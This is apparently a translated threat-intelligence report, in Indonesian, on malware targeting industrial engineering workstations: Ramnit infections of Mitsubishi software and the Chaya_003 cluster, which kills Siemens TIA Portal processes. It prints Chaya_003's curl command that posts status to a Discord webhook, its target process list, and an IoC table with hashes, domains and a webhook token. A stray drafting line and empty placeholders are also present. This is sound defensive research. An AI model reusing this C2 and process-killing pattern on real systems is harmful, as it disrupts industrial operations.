• January 13, 2025

Analisis Ancaman ICS: Malware Baru dan Eksperimental Dapat Membunuh Proses Teknik

Ringkasan

  • Analisis kami terhadap repositori malware publik menunjukkan terus meningkatnya malware yang menargetkan OT/ICS.
  • Lebih dari 20% serangan OT/ICS menargetkan workstation teknik, jadi kami fokus pada hal ini.
  • Kami melihat dua insiden dengan workstation teknik Mitsubishi yang terinfeksi worm Ramnit.
  • Kami menganalisis tiga sampel malware baru yang dapat menghentikan proses teknik Siemens — kami menamakannya Chaya_003.

Panduan

  • Perkuat workstation teknik.
  • Segmentasi jaringan.
  • Monitor untuk ancaman.
  • Analisis lengkap dan rekomendasi mitigasi ada di bawah.

Malware spesifik OT seperti FrostyGoop/BUSTLEBERM masih jauh lebih jarang dibandingkan dengan malware yang menargetkan perangkat lunak perusahaan atau sistem operasi seluler berdasarkan volume. Namun, tidak ada ruang untuk tidur tenang bagi operator keamanan di OT atau mereka yang mengelola keamanan sistem kontrol industri.

Malware di OT/ICS lebih umum daripada yang Anda kira — dan workstation teknik yang terhubung ke internet adalah target.

Kami baru-baru ini menganalisis keluarga botnet otomatis seperti Aisuru, Kaiten, dan Gafgyt, yang dapat ditemukan di repositori malware publik VirusTotal pada waktu yang sama dengan FrostyGoop/BUSTLEBERM. Yang kami temukan termasuk kredensial default perangkat OT untuk infeksi awal atau instruksi untuk menghapus direktori data sensitif.

Botnet tersebut biasanya menyusup ke jaringan melalui perangkat yang dapat diakses melalui internet. Menurut survei terbaru dari SANS Institute mengenai “State of ICS/OT Cybersecurity”, perangkat yang terhubung merupakan salah satu vektor serangan awal yang paling umum terlibat dalam insiden OT/sistem kontrol dunia nyata.

Survei SANS yang sama mengidentifikasi kompromi workstation teknik sebagai vektor serangan awal yang paling umum keempat, yang menyumbang lebih dari 20% insiden OT/sistem kontrol. Sebagai tanggapan, kami menganalisis jenis malware yang menargetkan workstation teknik yang tersedia di repositori VirusTotal selama periode 90 hari yang bertepatan dengan publikasi survei SANS. Penelitian kami mengungkapkan dua klaster aktivitas yang signifikan:

  • Klaster 1: Software eksekutabel workstation teknik Mitsubishi yang sah terinfeksi worm Ramnit dalam dua insiden terpisah.
  • Klaster 2: Tiga sampel malware eksperimental baru, yang kami namakan Chaya_003, yang dapat menghentikan proses teknik Siemens.

Pencarian: Malware Menargetkan Perangkat Lunak Teknik OT/ICS

Workstation teknik terletak pada tingkat 2 dan 3 dari model Purdue, seperti yang ditunjukkan dalam diagram arsitektur OT standar di bawah ini.

 

Pencarian: Malware Menargetkan Perangkat Lunak Teknik OT/ICS

Workstation teknik adalah komputer standar yang menjalankan sistem operasi tradisional, seperti Windows, bersama dengan perangkat lunak teknik khusus yang disediakan oleh produsen peralatan, seperti Siemens TIA Portal atau Mitsubishi GX Works. Perangkat lunak ini sangat penting untuk pengaturan dan pemrograman perangkat lapangan seperti programmable logic controller (PLC) yang beroperasi di tingkat bawah Model Purdue.

Untuk menyelidiki potensi ancaman, kami fokus pada identifikasi dua kategori artefak yang diunggah ke VirusTotal:

  • Eksekusi perangkat lunak teknik yang terdeteksi terinfeksi oleh alat deteksi malware umum.
  • File yang berpotensi berbahaya yang dirancang untuk berinteraksi dengan perangkat lunak teknik.

Untuk menangani kedua kasus ini, kami mengembangkan aturan YARA yang menggabungkan tanda tangan eksekutabel biner yang merujuk pada artefak OT khusus, termasuk nama eksekutabel, panggilan API dari DLL, dan sumber ikon. Tujuannya adalah untuk mengidentifikasi eksekutabel berbahaya yang menunjukkan perilaku, termasuk:

  • Menyematkan nama perangkat lunak teknik sebagai string
  • Menghubungkan atau mengekspor fungsi yang biasanya ditemukan dalam DLL perangkat lunak teknik
  • Atau menyamar sebagai perangkat lunak teknik yang sah dengan menggunakan ikon yang terlihat asli

Aturan YARA yang kami kembangkan mencakup tanda tangan untuk perangkat lunak teknik berikut:

  • Siemens TIA Portal
  • CODESYS v2
  • Mitsubishi GX Works
  • Rockwell Automation RSLogix500
  • Phoenix Contact PC Worx

Kami menerapkan aturan ini selama periode 90 hari, dari Agustus hingga November 2024 dan memperoleh hasil berikut:

  • Rockwell Automation dan CODESYS: Tidak ada kecocokan yang terdeteksi.
  • Phoenix Contact: 20 kecocokan teridentifikasi, semuanya adalah DLL benign.
  • Mitsubishi: 10 kecocokan terkait dengan file sah yang terinfeksi oleh worm Ramnit.
  • Siemens: 3 kecocokan dikonfirmasi sebagai eksekutabel berbahaya, sementara 1 kecocokan ditandai sebagai berbahaya namun akhirnya diidentifikasi sebagai positif palsu.

Pada bagian berikutnya, kami menganalisis sampel berbahaya ini secara rinci.

Ramnit: Infektor PE Kembali Menyerang

Investigasi kami mengungkapkan dua klaster Ramnit yang menginfeksi workstation teknik:

Klaster 1: Klaster ini berisi satu eksekutabel Mitsubishi GX Works dengan hash SHA-256: 703f0aac78d388f1fbe3800697015d092fa70cea2c01f22f456c8b1aa20a2334

Sampel ini dikirim dari Kanada pada 7 Juli 2024 dengan waktu pembuatan 16 April 2014.

Klaster 2: Klaster ini terdiri dari 9 DLL yang terkait dengan eksekutabel yang sama. Semua dikirim dari Amerika Serikat pada 18 Oktober 2024 dan memiliki waktu pembuatan 28 Mei 2018: 1b8957804dfa7324d10bf6d7ca22fc038951ab57ab1e6838da9c63ad057c1d20 5b63ca75f95dc549729bb6261e9dc22f6425547584366188770507bd964221b4 5ec05f903cc94d559b8eb23aa749805b78de2845bd2317017bc8e50cdceb613f 69eb2b940ba1fc7bc46699eeb3ff11d921683609f636efae05c0cb796b588a38 8b585155cdc7fcbe3d2fa169b307756557ef0d69afb392726f577a73f11d5a97 a1d721db0583eed0077bb8ab542ff15a806d24e2dbf13557b12842bd49995354 ad5922bcc740e5761a708c526d023450ca278168ebcefaaf80f85815d6d6d24e c1826e0d310a6a02f2ee1b5d88b6c0dd48baa8fe1dd99447e98e42c4ca023c96 fd8558b8a4165ebb47f120fa237c2ada306c430ae4cb2109eb644fd8b0b82b15

Perbedaan lokasi, waktu, dan versi pengiriman yang dikompilasi untuk bahasa yang berbeda menunjukkan bahwa ini adalah dua infeksi terpisah.

Ramnit adalah jenis malware yang pertama kali muncul pada tahun 2010 sebagai trojan perbankan yang dirancang untuk mencuri kredensial dari korban yang kemudian dijual di forum bawah tanah. Seiring waktu, Ramnit berkembang menjadi platform modular yang dapat mengunduh plugin dari server command and control (C2). Plugin ini memungkinkan fungsionalitas canggih, seperti desktop jarak jauh dan pengambilan screenshot.

Pada tahun 2021, Ramnit telah menjadi trojan perbankan yang paling aktif. Itu menggabungkan kode sumber yang disalin dari malware sebelumnya yang dikenal sebagai Zeus dan akhirnya mengarah pada pengembangan strain malware lainnya yang disebut Bumblebee pada tahun 2022.

Mandiant melaporkan pada tahun 2021 bahwa infeksi Ramnit pada perangkat lunak OT adalah bagian dari tren yang berkembang, bersama dengan infektor PE serupa lainnya – malware yang menyisipkan kode berbahaya ke dalam eksekutabel Windows yang sah. Contoh lainnya termasuk Sality, Virut, Expiro, DirtCleaner, Jeefo, Neshta, LockLoad, Parite, dan Floxif.

Kami tidak dapat memastikan apakah dua klaster Ramnit yang kami identifikasi secara langsung menargetkan sistem OT – yang mana – atau bagaimana workstation teknik terinfeksi. Jenis malware ini dapat menyebar melalui perangkat fisik yang terinfeksi, seperti USB, atau melalui jaringan yang terkompromi oleh sistem TI yang kurang tersegmentasi dengan baik. Namun, temuan kami menunjukkan bahwa tren yang diidentifikasi pada tahun 2021 tetap ada. Setidaknya satu dari infektor yang sama yang diamati tiga tahun lalu terus mempengaruhi jaringan OT di seluruh dunia.

DLL yang terinfeksi menjatuhkan eksekutabel, file yang dibungkus dengan UPX, ke C:\Program Files (x86)\Microsoft\DesktopLayer.exe. File ini, dengan hash SHA-256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320, telah diamati ribuan kali dengan berbagai nama file sejak 2010. Ini telah diunduh dari ratusan URL, termasuk contoh terbaru berikut:

  • 432i[.]com pada 2024-09-11
  • az-security[.]info pada 2024-10-08
  • 0g0d[.]com pada 2024-10-10
  • grpaper[.]com pada 2024-11-19

Eksekutabel yang dibongkar menggunakan pemuatan dinamis kode pada heap dan panggilan API Win32 tidak langsung. Namun, fungsinya terbatas pada pemunculan instance dari browser web default. Gambar di bawah ini merangkum alur eksekusi ini.

Chaya_003: Menghentikan Proses Teknik

Kami mengidentifikasi tiga berkas berikut yang dirancang untuk menghentikan proses Siemens TIA portal, bersama dengan proses lain yang berjalan di workstation teknik:

  • test.exe
    • Hash: b16a67f49ce5aa057236d2bff3e1ab2dcc2c6d3f2551e4520f54e125b2e289d8
    • Dikirim dari Belgia pada 3 Oktober.
  • Isass.exe
    • Hash: 517e35b32c4a1dedb155bbd208422cd5c5d34b5ec378712b7e8182fd26473c7e
    • Dikirim dari Belgia pada 4 Oktober.
  • elsass.exe
    • Hash: 9579c6987ac8969d0b0cc0cc2a9da3b034fac41525d96fa79fa02d05813e70f9
    • Dikirim dari Belgia pada 4 Oktober.

Nama “Isass.exe” dan “elsass.exe” menunjukkan pemalsuan yang disengaja sebagai proses sistem yang sah, kemungkinan besar dimaksudkan untuk menipu pengguna atau menghindari solusi antivirus.

Berkas-berkas ini mewakili tiga iterasi dari klaster malware yang kami beri nama Chaya_003, sesuai dengan konvensi penamaan kami untuk klaster aktivitas yang belum terkait dengan aktor ancaman yang dikenal, seperti yang sebelumnya diidentifikasi dengan nama Chaya_002.

Secara ringkas, Chaya_003 menggunakan infrastruktur C2 yang memanfaatkan webhook Discord, dipadukan dengan pengintaian sistem dan gangguan proses. Sampel-sampel ini menunjukkan pola evolusi yang jelas, berkembang dari versi pengujian yang lebih sederhana (test.exe) hingga varian yang lebih kaya fitur (elsass.exe), sementara berbagi infrastruktur dan ciri perilaku yang sama. Progresi ini menunjukkan pemurnian operasional yang sedang berlangsung dan potensi persiapan untuk penyebaran lebih luas.

Semua sampel menerapkan fungsionalitas untuk mengenumerasi proses sistem menggunakan panggilan API Win32 CreateToolhelp32Snapshot. Mereka mengambil informasi tentang setiap proses melalui Process32First dan membandingkan nama file eksekutabel di .szExeFile dengan daftar yang telah ditentukan sebelumnya, yang mencakup entri berikut:

  • word.exe
  • excel.exe
  • code.exe
  • powerpnt.exe
  • teams.exe
  • chrome.exe
  • firefox.exe
  • Siemens.Automation.Portal.exe
  • PacketTracer.exe

Jika suatu proses cocok dengan entri dalam daftar ini, proses tersebut dihentikan. Terlepas dari apakah penghentian berhasil atau gagal, sampel-sampel tersebut melaporkan status ke webhook Discord yang telah ditentukan.

Pesan C2 Discord dikirim melalui proses curl yang dipanggil dengan format berikut:

cmd.exe /c curl -H “Content-Type: application/json” -X POST -d “{\”content\”: \”<MESSAGE>”}” https://discord.com/api/webhooks/<SNOWFLAKE>/<TOKEN>

Dalam format ini, , , dan bervariasi antara sampel.

Sampel pertama (test.exe) menggunakan “iamawebhookfrfr” sebagai snowflake dan “69696969” sebagai token. Nilai-nilai ini tidak valid dan kemungkinan besar adalah placeholder untuk pengujian, sebelum membuat webhook yang valid.

Dua sampel lainnya (lsass.exe dan elsass.exe) menggunakan 1291410641793454080 sebagai snowflake dan rw6ox6Joq5OGasBLMDNIJON4IV5b0UlUIh24FqtlPK0FCvOzYzVSBGFT3b8DJnteaUcZ sebagai token. Token ini dibuat pada 3 Oktober 2024, hari yang sama ketika sampel “test.exe” dikirim ke VirusTotal.

Meskipun webhook ini sekarang dinonaktifkan, ID saluran terkait adalah 1291408530049335410 dan ID server adalah 1291408529357410377.

Pesan yang diamati terbagi menjadi dua kategori utama:

  1. Pembaruan Status Pesan yang diawali dengan “[!]”, “[*]” atau “[+]” umumnya memberikan pembaruan status. Sebagian besar ditulis dalam bahasa Belanda dengan beberapa pesan dalam bahasa Inggris.
    • “[!] PC is opgestart! Het proces Isass.exe loopt met succes. Alle processen in het oog houden…”
    • “[*] Proces gevonden: %s”
    • “[*] Crashing process…”
    • “[+] Successfully killed process with PID %lu”
  2. Atribusi dan Infrastruktur Pesan yang diawali dengan “[ 🙂 ]” tampaknya berisi rincian atribusi atau infrastruktur dan ditulis dalam bahasa Spanyol.
    • “[ 🙂 ] El mejor Technologia de la Catalunya”
    • “[ 🙂 ] Technologica esponsoriza por h921 industries, x86assembly.xyz y Team WhoStoleMyComputer”
    • “[ 🙂 ] Contribuciones par chatgpt, stackoverflow, y el mejor de todos, el internet.”

Berdasarkan pesan-pesan ini, kami menilai dengan keyakinan sedang bahwa sampel-sampel ini dibuat oleh kelompok yang dikenal dengan nama “h921 industries”, “x86assembly.xyz” dan “Team WhoStoleMyComputer”, yang tampaknya berbasis di Katalonia dan memanfaatkan kode yang terinspirasi oleh StackOverflow dan ChatGPT. Meskipun kami tidak menemukan sebutan tentang kelompok ini dalam laporan intelijen ancaman sebelumnya, ada preseden sejarah untuk kelompok hacktivist, seperti Anonymous, yang mendukung gerakan kemerdekaan Catalonia melalui serangan DDoS.

Pesan-pesan dalam bahasa Belanda dan pengiriman sampel dari Belgia menunjukkan bahwa beberapa pengembang mungkin berlokasi di wilayah berbahasa Belanda, Flanders.

Kami juga mencatat bahwa salah satu nama grup, x86assembly.xyz, sesuai dengan nama domain yang valid. Pencarian DNS pasif mengungkapkan bahwa domain ini telah mengarah ke alamat IP 198.185.159[.]144 sejak setidaknya 26 September 2024. Alamat IP ini memiliki riwayat distribusi malware, termasuk AsyncRAT.

Dengan memutar balik string yang sama (x86assembly.xyz), kami mengidentifikasi sampel lain di VirusTotal (1f1035b91db1264eb94aa055cdb50f35f0c27744e77e74b7031e099b112a5837) yang diberi label berbahaya (Win32/Wacapew). Sampel ini, yang dikirim dari Inggris pada 11 Oktober 2024, tampaknya tidak terkait dengan Chaya_003.

 

Mitigasi yang Disarankan

Temuan utama dari penyelidikan aktivitas berbahaya pada OT ini adalah bahwa malware spesifik OT masih jauh dari ancaman paling umum terhadap jaringan OT. Dalam postingan sebelumnya, kami menyoroti beberapa botnet yang menargetkan perangkat OT yang terekspos. Dalam postingan ini, kami memeriksa malware yang sudah dikenal dan baru yang menargetkan workstation teknik.

Klaster artefak yang kami identifikasi mungkin lebih banyak berfungsi sebagai gangguan di lingkungan OT yang sebenarnya. Namun, fakta bahwa jenis malware ini dapat menyusup ke jaringan kritis sangat mengkhawatirkan, termasuk sampel berusia 14 tahun yang diamati ribuan kali. Lebih mengkhawatirkan lagi adalah kemampuan kelompok peretas untuk menciptakan malware yang menargetkan proses teknik dengan bantuan AI generatif sambil menggunakan layanan yang sah untuk C2. Ketergantungan pada layanan sah ini membuat deteksi ancaman ini lebih menantang. Kesenjangan antara contoh yang relatif sederhana seperti Chaya_003 dan malware OT spesifik yang lebih canggih semakin menyempit, terutama karena AI generatif memungkinkan penyerang dengan keterampilan yang lebih sedikit untuk membuat kode OT spesifik.

Karena workstation teknik semakin menjadi target, kami menyarankan agar organisasi menerapkan langkah-langkah berikut untuk meningkatkan posisi keamanan OT mereka:

 

Memperkuat Workstation Teknik

  1. Identifikasi semua workstation yang terhubung ke jaringan OT
    • Pastikan semua workstation yang terhubung ke jaringan OT tercatat dan dipantau.
  2. Tinjau versi perangkat lunak, port terbuka, kredensial, dan perangkat lunak perlindungan endpoint
    • Lakukan penilaian terhadap perangkat lunak yang terpasang, port yang terbuka, kredensial yang digunakan, serta perlindungan endpoint pada workstation teknik.
  3. Pastikan perangkat lunak selalu diperbarui ke versi terbaru dan perlindungan endpoint aktif serta terbarui
    • Pastikan semua perangkat lunak workstation teknik diperbarui ke versi terbaru dan bahwa solusi perlindungan endpoint aktif serta diperbarui.

 

Segmentasi Jaringan

  1. Hindari paparan langsung workstation teknik ke internet
    • Jangan biarkan workstation teknik terhubung langsung ke internet untuk mengurangi risiko serangan.
  2. Segmentasikan jaringan dengan benar untuk memisahkan perangkat IT, IoT, dan OT
    • Pastikan jaringan IT, IoT, dan OT dipisahkan untuk membatasi dampak dari potensi ancaman yang melibatkan perangkat yang berbeda.
  3. Batasi koneksi jaringan hanya untuk workstation manajemen dan teknik yang sah, atau di antara perangkat yang tidak dikelola namun membutuhkan komunikasi
    • Hanya izinkan koneksi jaringan antara workstation manajemen atau teknik yang sah dan perangkat yang tidak dikelola yang memang membutuhkan komunikasi.

Pantau Ancaman

  1. Terapkan solusi pemantauan yang dapat mendeteksi indikator ancaman berbahaya, seperti malware IT yang dikenal
    • Gunakan solusi pemantauan yang dapat mengidentifikasi tanda-tanda serangan malware yang diketahui pada jaringan OT.
  2. Identifikasi perilaku mencurigakan, seperti penghentian proses sensitif, di seluruh sistem IT dan OT
    • Pantau dan deteksi perilaku yang mencurigakan, seperti upaya untuk menghentikan proses yang sensitif atau krusial, baik di sistem IT maupun OT.

Indikator Kompromi (IoC)

Indikator kompromi (IoC) yang tercantum di bawah ini tersedia pada threat feed Forescout Research – Vedere Labs:

(Anda dapat melanjutkan untuk mencantumkan IoCs yang relevan jika diinginkan.)

IOC Type Description
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320 SHA256 Ramnit
432i[.]com Domain Hosting Ramnit
az-security[.]info Domain Hosting Ramnit
0g0d[.]com Domain Hosting Ramnit
grpaper[.]com Domain Hosting Ramnit
b16a67f49ce5aa057236d2bff3e1ab2dcc2c6d3f2551e4520f54e125b2e289d8 SHA256 Chaya_003 first iteration
517e35b32c4a1dedb155bbd208422cd5c5d34b5ec378712b7e8182fd26473c7e SHA256 Chaya_003 second iteration
9579c6987ac8969d0b0cc0cc2a9da3b034fac41525d96fa79fa02d05813e70f9 SHA256 Chaya_003 third iteration
discord[.]com/api/webhooks/iamawebhookfrfr/69696969 URL Discord web hook in the first iteration of Chaya_003
discord[.]com/api/webhooks/1291410641793454080/
rw6ox6Joq5OGasBLMDNIJON4IV5b0UlUIh24FqtlPK0FCvOzYzVSBGFT3b8DJnteaUcZ		 URL Discord web hook in the second and third iterations
X86assembly[.]xyz Domain Possibly associated with the creators of Chaya_003
198.185.159[.]144 IP address Possibly associated with the creators of Chaya_003